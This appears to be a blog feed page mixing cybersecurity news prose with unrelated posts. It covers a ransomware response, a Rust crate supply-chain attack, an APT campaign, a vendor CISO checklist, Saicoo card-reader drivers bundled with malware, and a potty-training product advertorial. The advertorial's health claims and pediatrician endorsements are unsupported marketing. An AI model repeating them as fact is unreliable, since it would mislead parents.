Juan Andrés Guerrero-Saade, more popularly known as JAG-S, is Principal Threat Reseacher at SentinelLabs. JAG-S twitter feed is the first place to look for his unique insight into cyber war, espionage and nation-state threat actors as well as relevant retweets and commentary on what’s happening at the forefront of cybersecurity research and intelligence.

Conclusion

The beauty of Twitter is its diversity and accessibility, and so naturally there’s far more out there than just these 22 accounts to keep you informed and engaged. Think we’ve missed someone essential? Ping us on Twitter and let us know (though you might find them on one of our earlier lists here, here and here). And of course, don’t forget to follow SentinelOne and SentinelLabs on Twitter, too, to keep up with the latest cybersecurity news and threat intelligence.

The Good, The Bad and the Ugly in Cybersecurity – Week 21

/0 Comments/in /by

The Good

In the face of a cyber attack launched by the Hive ransomware group, the Bank of Zambia offered a particularly creative response to their attackers’ ransom note.

On May 13th, the Bank of Zambia released a public statement informing the public that they had been targeted by cyber criminals, and that the attack had caused “partial disruptions to some of its Information Technology (IT) applications on Monday, 9th May 2022.”

According to a recent report, the Hive ransomware group purportedly encrypted the Bank of Zambia’s Network Attached Storage (NAS) device. In response, representatives of the bank refused to pay the demanded ransom and chose to mock the hackers in their initial response.

The bank then linked a picture of male genitalia and told the attackers to “suck [it]” and “learn to monetize” because locking bank networks would be ineffective.

Although security experts assumed that unrelated parties had hijacked the negotiation chat, Greg Nsofu, Technical Director at the Bank of Zambia, tacitly confirmed that this was not the case.

Once the bank confirmed that its core systems were protected from the attack, Nsofu stated that the bank’s response “pretty much told them where to get off.”

Although this was an unorthodox response to threat actors, the Bank of Zambia’s proactive steps to protect their core systems and clear refusal to pay the ransom are exemplary of how organizations should prepare and respond to ransomware attacks.

The Bad

On May 19th, 2022, SentinelLabs shared their initial findings on a supply-chain attack against the Rust programming language development community, referred to as CrateDepression.

In an advisory published on May 10th, the Rust Security Response Working Group disclosed the discovery and removal of a malicious compilation unit from the crates.io community repository.

Security experts found that the threat actors attempted to impersonate a trusted Rust developer and uploaded malware to the Rust dependency community repository. The attacker(s) named their malicious crate “rustdecimal” in an attempt to typosquat and fool Rust developers looking to use the well-known rust_decimal crate.

Once the malicious crate infects a machine, the machine is scanned for the “GITLAB_CI” environment variable to identify GitLab Continuous Integration (CI) pipelines for software development. Infected CI pipelines are used to deliver a second-stage payload. The SentinelLabs team has identified these payloads as Go binaries built on the Mythic agent “Poseidon,” a red-teaming framework.

Although the responsible threat actors’ intent is currently unknown, the nature of their targets indicate that this attack could enable subsequent, larger scale supply-chain attacks relative to the development pipelines infected.

The Rust security team’s advisory recommends that organizations and projects running GitLab CI pipelines check whether they depended on the rustdecimal crate, starting from March 25th, 2022. If a dependency on that crate is detected, the CI environment may be compromised. The advisory also recommends regular dependency audits and exclusively using crates from trusted authors.

The SentinelLabs team has also assembled several Indicators of Compromise (IOCs) to assist security teams with proactive threat hunting, detection and response, which you can access here.

The Ugly

In the latest news surrounding international cyber attacks, an emerging Chinese threat group (dubbed “Space Pirates” by Russian threat analysts) is targeting Russian aerospace firms with phishing emails.

Analysts have determined that phishing emails sent to Russian, Mongolian and Georgian government-affiliated and private organizations in the aerospace, electric power and IT industries were designed to install custom malware and exfiltrate sensitive data from infected environments.

The Space Pirates were first observed while security professionals were responding to an incident in the summer of 2021, but analysts theorize that the group may have been active since at least 2019. A recent report found that the Space Pirates’ malware and infrastructure had been sighted in similar attacks, including two successful campaigns against state-sponsored Russian organizations.

During these attacks, the group was able to maintain access to servers and networks for extended periods of time, ranging from ten months up to over a year, stealing confidential documents, employee data and other critical information.

According to the findings, the cluster of activity attributed to the Space Pirates APT is just the latest in a rising trend of escalating attacks from Chinese threat actors against Russian entities. The threat group deploys signature Chinese malware such as ShadowPad and PlugX among a complex range of modular malware tools, custom loaders, and modified backdoors.

Chinese threat actors are also known to leverage tool exchanges and share tools to make it harder to identify specific threat groups, posing a difficult and taxing challenge for security professionals looking to identify threats and protect their systems. For organizations without modern defenses, these APTs and their malware continue to pose a serious risk.

How to Stay Ahead of the Adversary in 2022 | A Cybersecurity Checklist

/0 Comments/in /by

Rarely a week passes by without news of another company being breached, a ransomware attack crippling critical infrastructure, or a data loss event causing millions to suffer a loss of privacy. On the other hand, these same organizations are trying as hard as they can to safeguard their customers, their data and their reputations. So what is missing? Is it a gap in technology? Is it about strengthening policies and procedures? Is it simply “the cost of doing business” – an inevitable outcome of the way we work and trade today?

In this post, I will share a few of the main reasons why we are where we are, and provide some simple steps for enterprises to take to change this paradigm.

Top 5 Trends That Increase Cyber Security Risk in 2022

There are a vast number of threats and threat actors out there, and their numbers are only growing. This expansion reflects a number of major technological shifts in recent years that have contributed to the changing threat landscape.

1. Increasing Discovery of Software Vulnerabilities

Vulnerability hunting has hit the big-time in recent years, thanks in large part to the popularity of bug bounty programs and “hacker” platforms that reward researchers and share knowledge. This is not only a good thing, it’s undoubtedly a necessary thing.

However, the flipside of better vulnerability reporting is faster time to exploitation, as threat actors rapidly jump on research publications and look for victims that have failed or are unable to patch. Exploited vulnerabilities can cause serious damage to all organizations, including those running our critical infrastructure.

Phasing out unpatchable technology and obtaining visibility across the entire digital estate are imperatives. Until then, the net result is that the bar for breaching unwary organizations will keep getting lower.

2. The Hybrid Nature of Today’s Networks

Users and identity represent the new cybersecurity frontier as the world of work moves away from the office to remote or location independent. As long as users are connected, they remain part of your network, whether they are in the next office or on the other side of the world.

The new reality of a distributed workforce increases the risk to enterprises as attackers shift to targeting end users and endpoints via compromising credentials and authentication methods at any point along the entire supply chain.

Take, for example, the recent highly-publicized activities of the Lapsus$ hacker group, which among other things compromised Okta’s systems by gaining remote access to a machine belonging to an employee of Sitel, a company subcontracted to provide customer service functions for Okta.

3. The Migration to the Cloud

The new kid on the block is your cloud assets. While businesses are growing rapidly by scaling up their offering with the cloud, it makes it harder for security teams and defenses to stay on top of that risk. The security implications of AWS, Azure or other cloud assets is difficult to grasp for many businesses, even those with large SOCs.

From cloud misconfigurations and compromise through vulnerable services – think Log4J – protecting cloud workloads can be a challenging task, particularly when they are spread over public clouds, private clouds and on-prem data centers.

4. Increasing Attacks on IoT Devices

‘Smart devices’ that are connected to the internet have increased the attack surface for organizations. From networked printers to security cameras, anything connected to the public internet can serve as a backdoor into your organization.

Increased risk caused by IoT devices includes unchanged default passwords, outdated firmware with known exploitable vulnerabilities, and the lack of network discovery for many IT and security teams. As threat actors scan networks with automated tools for any sign of weakness, administrators similarly need automated tools that can identify and protect any device as it is plugged into the network.

The increasing use of unprotected or insecure Smart devices has given attackers an easy way into networks, a beachhead from which they launch attacks to steal information or commit fraud through ransomware or other techniques.

5. Increase in BYOD and Mobile Authentication

While the use of mobile devices in the workplace has been with us for a number of years now, mobiles and mobile authentication is still creating new opportunities for malicious actors to steal valuable data.

Mobile authentication, or the verification of a user’s identity through a mobile device and one or more authentication methods to ensure secure access, has opened a new stream of attacks, using recycled numbers and other new attack vectors. Recent examples include attackers using social engineering techniques against users suffering from so-called “MFA fatigue”, where multiple 2FA push notifications trick users into authenticating fake login attempts.

The Threat Landscape is Booming

The bar for compromising enterprise assets is lower than ever before. There are a few reasons for that. As one of the main operating system vendors, Microsoft plays a significant role in this area. There are too many ways attackers utilize vulnerabilities to exfiltrate secured networks. Some novel examples include ProxyLogon, Hafnium, and many others. There are growing voices in our industry criticizing the way Microsoft handles researcher vulnerability reporting, including some very vocal discussions. Other OS vendors should also improve the way they respond to vulnerabilities, and work more closely with security vendors to make their products better.

Key Takeaways – A CISO’s Cybersecurity Checklist

  • Eat Your Vegetables – Always stay ahead of best practices, ensuring you kill off any “low-hanging fruit” attack vectors. This includes enforcing multi-factor authentication and deploying endpoint protection on every computer, cloud or mobile device. Use your budget and create teams who live and breathe securing your organizations. Know your adversaries. Simulate attacks and see that you are ready for the day of a breach. Create backups. There are no shortcuts here.
  • Create a Coalition – Cybersecurity is not a challenge only for the CISO: It’s a priority for the company. This means the CEO, the board of directors and other senior stakeholders should be aware of the risks and consider them against the priorities of the business.

    In 2022, there is no business without security. The CISO needs to ensure that all these stakeholders are aware of that and that they understand securing the enterprise does not happen in a silo. Share news, simulate breach responses, raise awareness. A breach can be caused by malicious actors or happen accidentally, but either way, it can cost companies millions in damages, lost revenue and reputational harm.
  • Stay Informed, and Increase Awareness of End Users – Follow the news and share with your users. While some headlines can inevitably be overblown, they can also be motivating, and there’s nothing exaggerated about the cost of ransomware, BEC, fraud and other cybercrimes to businesses today. Keep your people in the know regarding cybersecurity risks by encouraging them to be aware and interested in cyberspace. If the topic is good enough for mainstream television, we can make it good enough for our users also.
  • Get an Outsider’s Perspective – If you can run a red team, that’s great. If you cannot, work to establish periodic red team exercises to ensure there are no blind spots within your organization. If you are developing software or providing software as a service, run a bug bounty program and ensure “friendly eyes” are discovering your vulnerabilities before attackers do.
  • Know Your Enterprise Assets – How well do you know the security implications of your AWS, Azure or other cloud assets? What are the security implications of running Docker and Kubernetes? Cloud-focused attacks are a rapidly growing area of interest to opportunistic and targeted attackers alike.

    While the techniques used in such attacks are vast and varied, they typically rely heavily on the fact that cloud networks are large, complex, and onerous to manage. This makes agent and container security solutions critical for the defense of any organization against all cloud platforms. Look for and deploy security solutions that make this complexity simple.
  • Remember Supply Chain Attacks – Be in the know to reduce the risk of supply chain attacks. Although it is difficult for any security team to monitor and approve every business application entering the enterprise, visibility into every device can provide good insight into applications that may be more vulnerable than your end users believe.

    The previous year in cybersecurity showed us all how easy it is for adversaries to compromise widely-used applications. The SolarWinds and Kaseya compromises were unfortunate but timely reminders that software dependencies are a massive blindspot. When organizations rely on shared modules, plug-ins, and packages from open-source or non-security focused developers, the chance of such components being secure out-of-the-box is low.

    Attacks tend to seek the easy way in, and compromising relatively weak applications that are used by many is all an attacker needs. Technology can help to maximize visibility across the entire cyber estate.

Conclusion

There are no magic bullets, and cybersecurity remains a challenge that requires focus, knowledge and the right solutions that fit your business needs. SentinelOne is here to help CISOs with the challenge of securing the enterprise. To learn more about how to defend and protect your organization from today’s adversaries, contact us for more information or request a free demo.

Singularity Cloud
Simplifying security of Cloud VMs and containers, no matter their location, for maximum agility, security, and compliance.

GET A DEMO

Super Potty Trainer – A Shark Tank Product For Toddlers Which Takes The Internet By Storm!

/0 Comments/in /by

Super Potty Trainer is the newest and most innovative potty training product on the market. It was recently featured on Shark Tank and has taken the Internet by storm! This unique product makes potty training easier and more fun for both parents and toddlers.

The Super Potty Trainer features a patented design that allows toddlers to sit on the regular toilet seat, giving them extra back support and making it more comfortable. This simple idea has made potty training more efficient and less messy for parents and less stressful, and more fun for toddlers!

The history behind the Super Potty Trainer that makes it so special

Super Potty Trainer was created by a mom – Judy Abrahams – who was potty training her own toddler. She saw how difficult and stressful it was for both parents and toddlers: her child was afraid of falling in, and she constantly had to clean up accidents. To make things worse, Judy’s daughter was so stressed out that she would become constipated!

Judy realized that there had to be a better way to potty train and set out to find it. After months of research and development, she created the Super Potty Trainer: a potty training seat that gives toddlers the extra back support they need, making it more comfortable and less stressful for them.

The product was an instant success with parents and toddlers alike and quickly became a must-have for any family potty training their child. It has even been featured on Shark Tank, where it received rave reviews from the sharks!

The Internet is abuzz with Super Potty Trainer reviews, and it is quickly becoming the go-to product for potty training. If you are looking for a potty training solution that is effective and fun, look no further than Super Potty Trainer!

CHECK THE PRICE ON AMAZON

How does the Super Potty Trainer work?

The Super Potty Trainer is a potty training system that helps toddlers transition from diapers to the toilet. The way this innovative product works is simple; it attaches to the regular toilet and provides extra back support for toddlers. This back support makes it more comfortable for toddlers to sit on the toilet and helps prevent them from making a mess.

See how it works – it is easy as 1-2-3!

  1. Lift the toilet seat. Place the Super Potty Trainer on a clean, dry toilet rim.
  2. Lower the seat to keep it in place.
  3. Your toddler is ready to start potty training!

The Super Potty Trainer allows you to adjust the depth of your toilet seat so it is always a comfortable fit for your toddler: simply move Super Potty Trainer forward or backward on the toilet to suit your child’s preferences.

This product is also easy to clean and is made from durable, high-quality materials.

Will Super Potty Trainer fit my toilet?

The Super Potty Trainer is designed to fit most toilets. There is an easy way to check if your toilet is compatible with the product. All you need to do is check if there is a little gap between the toilet seat and the rim of your toilet. If there is a gap, your toilet is compatible with the Super Potty Trainer.

It is also possible to make your toilet compatible with Super Potty Trainer if there is no gap between the toilet seat and the rim. You can do this by replacing the toilet seat for the one that has bumpers – these will create a small gap and make the toilet compatible with the product.

Loved by pediatricians and parents

Both pediatricians and parents love Super Potty Trainer. Pediatricians recommend Super Potty Trainer because it’s a simple and safe way to potty train toddlers. It allows a toddler to have a proper position on the toilet, which is essential for right elimination. And that prevents constipation and urinary infections.

Parents love Super Potty Trainer because it makes potty training less stressful for both the parent and toddlers. The product is also very affordable and easy to use.

If you are looking for an easy, stress-free way to potty train your toddler, then Super Potty Trainer is your product!

The post Super Potty Trainer – A Shark Tank Product For Toddlers Which Takes The Internet By Storm! appeared first on Comfy Bummy.

When Your Smart ID Card Reader Comes With Malware

/0 Comments/in /by

Millions of U.S. government employees and contractors have been issued a secure smart ID card that enables physical access to buildings and controlled spaces, and provides access to government computer networks and systems at the cardholder’s appropriate security level. But many government employees aren’t issued an approved card reader device that lets them use these cards at home or remotely, and so turn to low-cost readers they find online. What could go wrong? Here’s one example.

A sample Common Access Card (CAC). Image: Cac.mil.

KrebsOnSecurity recently heard from a reader — we’ll call him “Mark” because he wasn’t authorized to speak to the press — who works in IT for a major government defense contractor and was issued a Personal Identity Verification (PIV) government smart card designed for civilian employees. Not having a smart card reader at home and lacking any obvious guidance from his co-workers on how to get one, Mark opted to purchase a $15 reader from Amazon that said it was made to handle U.S. government smart cards.

The USB-based device Mark settled on is the first result that currently comes up one when searches on Amazon.com for “PIV card reader.” The card reader Mark bought was sold by a company called Saicoo, whose sponsored Amazon listing advertises a “DOD Military USB Common Access Card (CAC) Reader” and has more than 11,700 mostly positive ratings.

The Common Access Card (CAC) is the standard identification for active duty uniformed service personnel, selected reserve, DoD civilian employees, and eligible contractor personnel. It is the principal card used to enable physical access to buildings and controlled spaces, and provides access to DoD computer networks and systems.

Mark said when he received the reader and plugged it into his Windows 10 PC, the operating system complained that the device’s hardware drivers weren’t functioning properly. Windows suggested consulting the vendor’s website for newer drivers.

The Saicoo smart card reader that Mark purchased. Image: Amazon.com

So Mark went to the website mentioned on Saicoo’s packaging and found a ZIP file containing drivers for Linux, Mac OS and Windows:

Image: Saicoo

Out of an abundance of caution, Mark submitted Saicoo’s drivers file to Virustotal.com, which simultaneously scans any shared files with more than five dozen antivirus and security products. Virustotal reported that some 43 different security tools detected the Saicoo drivers as malicious. The consensus seems to be that the ZIP file currently harbors a malware threat known as Ramnit, a fairly common but dangerous trojan horse that spreads by appending itself to other files.

Image: Virustotal.com

Ramnit is a well-known and older threat — first surfacing more than a decade ago — but it has evolved over the years and is still employed in more sophisticated data exfiltration attacks. Amazon said in a written statement that it was investigating the reports.

“Seems like a potentially significant national security risk, considering that many end users might have elevated clearance levels who are using PIV cards for secure access,” Mark said.

Mark said he contacted Saicoo about their website serving up malware, and received a response saying the company’s newest hardware did not require any additional drivers. He said Saicoo did not address his concern that the driver package on its website was bundled with malware.

In response to KrebsOnSecurity’s request for comment, Saicoo sent a somewhat less reassuring reply.

“From the details you offered, issue may probably caused by your computer security defense system as it seems not recognized our rarely used driver & detected it as malicious or a virus,” Saicoo’s support team wrote in an email.

“Actually, it’s not carrying any virus as you can trust us, if you have our reader on hand, please just ignore it and continue the installation steps,” the message continued. “When driver installed, this message will vanish out of sight. Don’t worry.”

Saicoo’s response to KrebsOnSecurity.

The trouble with Saicoo’s apparently infected drivers may be little more than a case of a technology company having their site hacked and responding poorly. Will Dormann, a vulnerability analyst at CERT/CC, wrote on Twitter that the executable files (.exe) in the Saicoo drivers ZIP file were not altered by the Ramnit malware — only the included HTML files.

Dormann said it’s bad enough that searching for device drivers online is one of the riskiest activities one can undertake online.

“Doing a web search for drivers is a VERY dangerous (in terms of legit/malicious hit ratio) search to perform, based on results of any time I’ve tried to do it,” Dormann added. “Combine that with the apparent due diligence of the vendor outlined here, and well, it ain’t a pretty picture.”

But by all accounts, the potential attack surface here is enormous, as many federal employees clearly will purchase these readers from a myriad of online vendors when the need arises. Saicoo’s product listings, for example, are replete with comments from customers who self-state that they work at a federal agency (and several who reported problems installing drivers).

A thread about Mark’s experience on Twitter generated a strong response from some of my followers, many of whom apparently work for the U.S. government in some capacity and have government-issued CAC or PIV cards.

Two things emerged clearly from that conversation. The first was general confusion about whether the U.S. government has any sort of list of approved vendors. It does. The General Services Administration (GSA), the agency which handles procurement for federal civilian agencies, maintains a list of approved card reader vendors at idmanagement.gov (Saicoo is not on that list). [Thanks to @MetaBiometrics and @shugenja for the link!]

The other theme that ran through the Twitter discussion was the reality that many people find buying off-the-shelf readers more expedient than going through the GSA’s official procurement process, whether it’s because they were never issued one or the reader they were using simply no longer worked or was lost and they needed another one quickly.

“Almost every officer and NCO [non-commissioned officer] I know in the Reserve Component has a CAC reader they bought because they had to get to their DOD email at home and they’ve never been issued a laptop or a CAC reader,” said David Dixon, an Army veteran and author who lives in Northern Virginia. “When your boss tells you to check your email at home and you’re in the National Guard and you live 2 hours from the nearest [non-classified military network installation], what do you think is going to happen?”

Interestingly, anyone asking on Twitter about how to navigate purchasing the right smart card reader and getting it all to work properly is invariably steered toward militarycac.com. The website is maintained by Michael Danberry, a decorated and retired Army veteran who launched the site in 2008 (its text and link-heavy design very much takes one back to that era of the Internet and webpages in general). His site has even been officially recommended by the Army (PDF). Mark shared emails showing Saicoo itself recommends militarycac.com.

Image: Militarycac.com.

“The Army Reserve started using CAC logon in May 2006,” Danberry wrote on his “About” page. “I [once again] became the ‘Go to guy’ for my Army Reserve Center and Minnesota. I thought Why stop there? I could use my website and knowledge of CAC and share it with you.”

Danberry did not respond to requests for an interview — no doubt because he’s busy doing tech support for the federal government. The friendly message on Danberry’s voicemail instructs support-needing callers to leave detailed information about the issue they’re having with CAC/PIV card readers.

Dixon said Danberry has “done more to keep the Army running and connected than all the G6s [Army Chief Information Officers] put together.”

In many ways, Mr. Danberry is the equivalent of that little known software developer whose tiny open-sourced code project ends up becoming widely adopted and eventually folded into the fabric of the Internet.  I wonder if he ever imagined 15 years ago that his website would one day become “critical infrastructure” for Uncle Sam?